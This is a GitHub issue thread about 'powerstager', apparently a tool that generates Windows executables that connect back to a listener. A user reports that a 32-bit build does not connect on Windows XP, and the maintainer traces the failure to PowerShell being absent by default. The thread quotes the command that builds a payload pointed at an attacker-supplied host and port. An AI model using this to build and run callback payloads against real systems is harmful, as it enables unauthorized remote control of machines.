### ISSUE TITLE
powerstage issues in windows xp

### ISSUE THREAD

**Issue by peterpt** [z0noxz/powerstager#7]
creating a 32bit exe with command : 
powerstager -t win32 -o test.exe -m --lhost (myip) --lport (my listening port)
and running the exe in windows xp 32bit , the file does not establish a connection to the source .

**Comment by z0noxz** [comment]
I'm not sure, but I don't think PowerShell is natively installed in Windows XP. I only think PowerShell is installed by default in Windows 7  or later and Windows Server 2008 R2 or later. I currently don't have a Windows XP in my lab. I can set one up to verify this, but it'll take some time. You might be able to verify this by running:

`<Windows Key>+R`
`cmd /c "powershell -noexit -c "$PSVersionTable.PSVersion.Major"`

If PowerShell 2.0 or later is installed it should print a '2' or higher.

**Comment by peterpt** [comment]
you are right my friend , on XP by default powershell does not come installed .
User must install powershell .
https://support.microsoft.com/en-us/help/968929/windows-management-framework-windows-powershell-2.0,-winrm-2.0,-and-bits-4.0
